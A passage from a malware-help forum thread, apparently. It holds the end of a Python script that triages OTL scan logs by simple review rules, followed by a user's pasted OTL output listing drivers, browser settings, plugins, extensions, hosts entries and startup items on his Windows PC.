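    r"SRV:64bit: - [2011/06/29 09:51:26 | 000,171,688 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Windows\SysNative\IPROSetMonitor.exe -- (Intel(R)",
    r"DRV:64bit: - [2006/11/28 20:46:20 | 000,043,328 | ---- | M] (Printing Communications Assoc., Inc. (PCAUSA)) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\PCAMp50a64.sys -- (PCAMp50a64)",
]


def parse_line(line: str):
    """Return a dict of the entry's fields, or None if the line is not an OTL entry."""
    m = LINE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["size"] = int(entry["size"].replace(",", ""))
    entry["modified"] = datetime.strptime(entry["date"], "%Y/%m/%d %H:%M:%S")
    return entry


def triage(lines, scan_time: datetime, file_age_days: int = FILE_AGE_DAYS) -> list:
    """Return one finding per entry that trips at least one review rule, in log order."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = []
        if not entry["company"]:
            reasons.append("no company name")
        if USER_WRITABLE.search(entry["path"]):
            reasons.append("user-writable location")
        if scan_time - entry["modified"] <= timedelta(days=file_age_days):
            reasons.append("modified within file-age window")
        if reasons:
            findings.append({"kind": entry["kind"], "path": entry["path"],
                             "company": entry["company"], "reasons": reasons})
    return findings


def triage_sample() -> list:
    return triage(SAMPLE_LINES, SCAN_TIME)


if __name__ == "__main__":
    for f in triage_sample():
        print(f"{f['kind']:4} {f['path']}  <- {', '.join(f['reasons'])}")
```

The rules are deliberately coarse: they surface OTL.exe itself (recent, in Downloads) and signed-by-nobody files such as MSI Afterburner alongside anything genuinely suspect, which is the same noise a human reader wades through. Their value is that nothing in those three classes is skipped when the log runs to hundreds of lines.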
 

Reply #8 by tomfullerton, January 23, 2015, 09:21:00 PM
Continuing from the other post:

========== Driver Services (SafeList) ==========
 
DRV:64bit: - [2014/11/18 15:02:16 | 000,084,992 | ---- | M] (Intel  Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\IntelHaxm.sys -- (IntelHaxm)
DRV:64bit: - [2014/07/17 17:05:06 | 000,125,584 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\NisDrvWFP.sys -- (NisDrv)
DRV:64bit: - [2014/07/14 12:09:16 | 000,013,568 | ---- | M] (Resplendence Software Projects Sp.) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rspCrash64.sys -- (rspCrash)
DRV:64bit: - [2014/03/31 11:42:44 | 000,040,392 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nvvad64v.sys -- (nvvad_WaveExtensible)
DRV:64bit: - [2014/03/26 18:00:14 | 000,141,600 | ---- | M] (Oracle Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\VBoxNetAdp.sys -- (VBoxNetAdp)
DRV:64bit: - [2013/10/01 21:22:20 | 000,056,832 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2013/07/19 16:12:38 | 000,052,080 | ---- | M] (Cisco Systems, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vpnva64-6.sys -- (vpnva)
DRV:64bit: - [2013/07/19 16:10:16 | 000,112,080 | R--- | M] (Cisco Systems, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acsock64.sys -- (acsock)
DRV:64bit: - [2013/01/22 17:08:56 | 000,004,608 | ---- | M] (RealVNC Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vncmirror.sys -- (vncmirror)
DRV:64bit: - [2012/12/13 14:50:36 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)
DRV:64bit: - [2012/08/21 12:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:64bit: - [2012/06/07 10:17:04 | 000,319,336 | ---- | M] (Marvell Semiconductor, Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\mv91xx.sys -- (mv91xx)
DRV:64bit: - [2012/05/30 21:10:15 | 000,121,416 | ---- | M] (MotioninJoy) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\MijXfilt.sys -- (MotioninJoyXFilter)
DRV:64bit: - [2012/03/01 01:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2012/02/09 01:06:36 | 000,125,376 | ---- | M] (Power Software Ltd) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\scdemu.sys -- (SCDEmu)
DRV:64bit: - [2011/07/20 12:58:22 | 000,044,032 | ---- | M] (Research in Motion Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\RimSerial_AMD64.sys -- (RimVSerPort)
DRV:64bit: - [2011/07/20 08:37:56 | 000,342,704 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\e1c62x64.sys -- (e1cexpress)
DRV:64bit: - [2011/06/21 09:26:40 | 000,336,048 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\e1q62x64.sys -- (e1qexpress)
DRV:64bit: - [2011/04/15 10:08:26 | 012,228,128 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:64bit: - [2011/03/11 01:41:12 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2011/03/11 01:41:12 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2011/01/19 17:47:18 | 000,021,992 | ---- | M] (CPUID) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\cpuz135_x64.sys -- (cpuz135)
DRV:64bit: - [2010/12/10 12:50:36 | 000,181,248 | ---- | M] (Renesas Electronics Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nusb3xhc.sys -- (nusb3xhc)
DRV:64bit: - [2010/12/10 12:50:36 | 000,080,384 | ---- | M] (Renesas Electronics Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nusb3hub.sys -- (nusb3hub)
DRV:64bit: - [2010/11/20 22:24:43 | 000,020,992 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:64bit: - [2010/11/20 22:23:48 | 000,117,248 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tsusbhub.sys -- (tsusbhub)
DRV:64bit: - [2010/11/20 22:23:48 | 000,088,960 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Synth3dVsc.sys -- (Synth3dVsc)
DRV:64bit: - [2010/11/20 22:23:48 | 000,071,168 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc)
DRV:64bit: - [2010/11/20 22:23:48 | 000,034,816 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\terminpt.sys -- (terminpt)
DRV:64bit: - [2010/11/20 22:23:47 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2010/11/20 22:23:47 | 000,031,232 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:64bit: - [2010/10/15 00:28:16 | 000,317,440 | ---- | M] (Intel(R) Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud)
DRV:64bit: - [2010/09/29 10:34:50 | 000,377,176 | ---- | M] (Logitech) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ladfSBVMamd64.sys -- (LADF_SBVM)
DRV:64bit: - [2010/09/29 10:34:48 | 000,062,168 | ---- | M] (Logitech) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ladfDHP2amd64.sys -- (LADF_DHP2)
DRV:64bit: - [2010/08/10 16:29:14 | 000,120,920 | ---- | M] (JMicron Technology Corp.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\jraid.sys -- (JRAID)
DRV:64bit: - [2010/07/08 03:32:19 | 000,050,056 | ---- | M] (Saitek) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\SaiBus.sys -- (SaiNtBus)
DRV:64bit: - [2010/07/08 03:32:19 | 000,022,792 | ---- | M] (Saitek) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\SaiMini.sys -- (SaiMini)
DRV:64bit: - [2010/07/08 03:32:14 | 000,172,040 | ---- | M] (Saitek) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SaiK0836.sys -- (SaiK0836)
DRV:64bit: - [2010/02/08 07:32:00 | 000,014,992 | ---- | M] (Cisco Systems, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\CVirtA64.sys -- (CVirtA)
DRV:64bit: - [2009/11/24 14:29:16 | 000,074,960 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\xusb21.sys -- (xusb21)
DRV:64bit: - [2009/07/13 20:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009/07/13 20:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009/07/13 20:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009/07/13 19:10:47 | 000,011,264 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rootmdm.sys -- (ROOTMODEM)
DRV:64bit: - [2009/07/13 19:09:10 | 000,007,680 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\loop.sys -- (msloop)
DRV:64bit: - [2009/06/17 08:54:30 | 000,057,872 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LMouFilt.Sys -- (LMouFilt)
DRV:64bit: - [2009/06/17 08:54:22 | 000,055,312 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LHidFilt.Sys -- (LHidFilt)
DRV:64bit: - [2009/06/10 15:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2009/06/10 15:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2009/06/10 15:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:64bit: - [2009/06/10 15:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV:64bit: - [2009/03/25 10:48:00 | 000,153,128 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\s1018mdm.sys -- (s1018mdm)
DRV:64bit: - [2009/03/25 10:48:00 | 000,146,472 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\s1018unic.sys -- (s1018unic)
DRV:64bit: - [2009/03/25 10:48:00 | 000,133,160 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\s1018mgmt.sys -- (s1018mgmt)
DRV:64bit: - [2009/03/25 10:48:00 | 000,128,552 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\s1018obex.sys -- (s1018obex)
DRV:64bit: - [2009/03/25 10:48:00 | 000,113,704 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\s1018bus.sys -- (s1018bus)
DRV:64bit: - [2009/03/25 10:48:00 | 000,034,856 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\s1018nd5.sys -- (s1018nd5)
DRV:64bit: - [2009/03/25 10:48:00 | 000,019,496 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\s1018mdfl.sys -- (s1018mdfl)
DRV:64bit: - [2008/11/16 17:39:44 | 000,157,968 | ---- | M] (Deterministic Networks, Inc.) [Kernel | Disabled | Stopped] -- C:\Windows\SysNative\drivers\dne64x.sys -- (DNE)
DRV:64bit: - [2008/08/04 23:21:48 | 001,075,712 | ---- | M] (Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\WPN111vx.sys -- (WPN111)
DRV:64bit: - [2006/11/28 20:46:20 | 000,043,328 | ---- | M] (Printing Communications Assoc., Inc. (PCAUSA)) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\PCAMp50a64.sys -- (PCAMp50a64)
DRV:64bit: - [2006/11/28 20:46:20 | 000,041,280 | ---- | M] (Printing Communications Assoc., Inc. (PCAUSA)) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\PCASp50a64.sys -- (PCASp50a64)
DRV - [2014/05/19 05:46:34 | 000,013,480 | ---- | M] () [Kernel | On_Demand | Running] -- E:\Program Files (x86)\MSI Afterburner\RTCore64.sys -- (RTCore64)
DRV - [2009/07/13 20:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
 
 
IE - HKU\.DEFAULT\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.loca
 
IE - HKU\S-1-5-18\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.loca
 
IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
 
IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
 
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs =
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP =
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\..\SearchScopes\{B2BDB263-17DB-4090-80D7-8B05E67E35D7}: "URL" = https://www.google.com/search?q={searchTerms}
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\..\SearchScopes\{F7AA63F3-AE9E-4E2E-BF1A-7DD143703456}: "URL" = https://search.yahoo.com/yhs/search?hspart=w3i&hsimp=yhs-synd1&p={searchTerms}&type=W3i_DS,221,0_0,Search,20140727,0,0,0,7743
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 

Reply #9, January 23, 2015, 09:21:44 PM

tomfullerton

Re: windows/SysWOW64/rundll32.exe halp me ?
« Reply #9 on: January 23, 2015, 09:21:44 PM »
------------------***************Continuing from the other post ************-----------------



========== FireFox ==========
 
FF:64bit: - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.51.2: C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.51.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: C:\Program Files\Microsoft Silverlight\5.1.31211.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=:  File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: E:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.71.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.71.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: C:\Program Files (x86)\Microsoft Silverlight\5.1.31211.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@spoon.net/Spoon Plugin 3.33: C:\Program Files (x86)\Spoon\3.33.8.485\npMozillaSpoonPlugin.dll File not found
FF - HKLM\Software\MozillaPlugins\@wolfram.com/Mathematica: C:\Program Files (x86)\Common Files\Wolfram Research\Browser\8.0.4.2609412\npmathplugin.dll File not found
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Users\Tom Jones\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Users\Tom Jones\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF - HKCU\Software\MozillaPlugins\ubisoft.com/uplaypc: C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll File not found
 
 
[2014/02/09 23:37:26 | 000,215,040 | ---- | M] (Cisco WebEx LLC) -- C:\Program Files (x86)\mozilla firefox\plugins\npatgpc.dll
[2011/12/09 12:23:32 | 000,012,800 | ---- | M] (Nullsoft, Inc.) -- C:\Program Files (x86)\mozilla firefox\plugins\npwachk.dll
 
========== Chrome  ==========
 
CHR - default_search_provider:  (Enabled)
CHR - default_search_provider: search_url =
CHR - default_search_provider: suggest_url =
CHR - plugin: Shockwave Flash (Enabled) = C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\39.0.2171.99\PepperFlash\pepflashplayer.dll
CHR - plugin: Chrome Remote Desktop Viewer (Disabled) = internal-remoting-viewer
CHR - plugin: Native Client (Enabled) = C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\39.0.2171.99\ppGoogleNaClPluginChrome.dll
CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\39.0.2171.99\pdf.dll
CHR - plugin: Conduit Chrome Plugin (Enabled) = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljfhnpbhhmmhdamdbpmajlonoecdobln\10.13.20.29_0\plugins/ConduitChromeApiPlugin.dll
CHR - plugin: Conduit Radio Plugin (Enabled) = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljfhnpbhhmmhdamdbpmajlonoecdobln\10.13.20.29_0\plugins/np-cwmp.dll
CHR - plugin: Adobe Acrobat (Enabled) = C:\Program Files (x86)\Adobe\Reader 11.0\Reader\Browser\nppdf32.dll
CHR - plugin: 2007 Microsoft Office system (Enabled) = C:\Program Files (x86)\Mozilla Firefox\plugins\NPOFF12.DLL
CHR - plugin: Winamp Application Detector (Enabled) = C:\Program Files (x86)\Mozilla Firefox\plugins\npwachk.dll
CHR - plugin: Wolfram Mathematica (Enabled) = C:\Program Files (x86)\Common Files\Wolfram Research\Browser\8.0.4.2609412\npmathplugin.dll
CHR - plugin: Silverlight Plug-In (Enabled) = C:\Program Files (x86)\Microsoft Silverlight\5.1.10516.0\npctrl.dll
CHR - plugin: Java(TM) Platform SE 7 U5 (Enabled) = C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\plugin2\npjp2.dll
CHR - plugin: Shockwave Flash (Enabled) = C:\Windows\SysWOW64\Macromed\Flash\NPSWF32.dll
CHR - plugin: Windows Activation Technologies (Enabled) = C:\Windows\system32\Wat\npWatWeb.dll
CHR - plugin: iTunes Application Detector (Enabled) = E:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\ajjloplcjllkammemhenacfjcccockde\1.2.9_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\bcdabfmndggphffkchfdcekcokmbnkjl\1.7_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn\0.1.1.5023_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkeidgmehkdjmpjodpjkepolokanalkm\3_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\blelaljgakacjdeaggpjilljobdmboff\2.0_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb\1.8.10_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcdjknjpbnhdoabbngpmfekaecnpajba\1.0_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\hokdglbhghcebcopdbanieangmcamaak\1.0_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbmfpngjjgdllneeigpgjifpgocmfgmb\4.5.4_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\lhoahihokddepjlegpenefeaahdkojog\1.4.2.6_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljmpblpndedodbmceeghpahabeppemed\0.4_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\nejdjlaibiicicciokonbbkecjleilon\1.6.3_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\oilipfekkmncanaajkapbpancpelijih\2.0.6_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\okadibdjfemgnhjiembecghcbfknbfhg\7.2.1_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolicfpkpnpbaonkibdjkpbchakfdmig\0.93_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\pemhgklkefakciniebenbfclihhmmfcd\3.3.9_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\pgeolalilifpodheeocdmbhehgnkkbak\0.2.94_0\
CHR - Extension: No name found = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0\
 
O1 HOSTS File: ([2015/01/20 23:10:57 | 000,000,822 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O1 - Hosts: 127.0.0.1       localhost
O1 - Hosts: ::1             localhost
O2:64bit: - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2:64bit: - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O2:64bit: - BHO: (Adblock Plus for IE Browser Helper Object) - {FFCB3198-32F3-4E8B-9539-4324694ED664} - C:\Program Files\Adblock Plus for IE\AdblockPlus64.dll (Adblock Plus)
O2 - BHO: (Microsoft Web Test Recorder 12.0 Helper) - {432dd630-7e03-4c97-9d62-b99f52df4fc2} - E:\Program Files (x86)\Microsoft Visual Studio 12.0\Common7\IDE\PrivateAssemblies\Microsoft.VisualStudio.QualityTools.RecorderBarBHO100.dll (Microsoft Corporation)
O2 - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O4:64bit: - HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [Kernel and Hardware Abstraction Layer] C:\Windows\KHALMNPR.Exe (Logitech, Inc.)
O4:64bit: - HKLM..\Run: [MSC] C:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O4:64bit: - HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation)
O4 - HKLM..\Run: [JMB36X IDE Setup] C:\Windows\RaidTool\xInsIDE.exe ()
O4 - HKLM..\Run: [Logitech G35] C:\Program Files (x86)\Logitech\G35\G35.exe (Logitech(c))
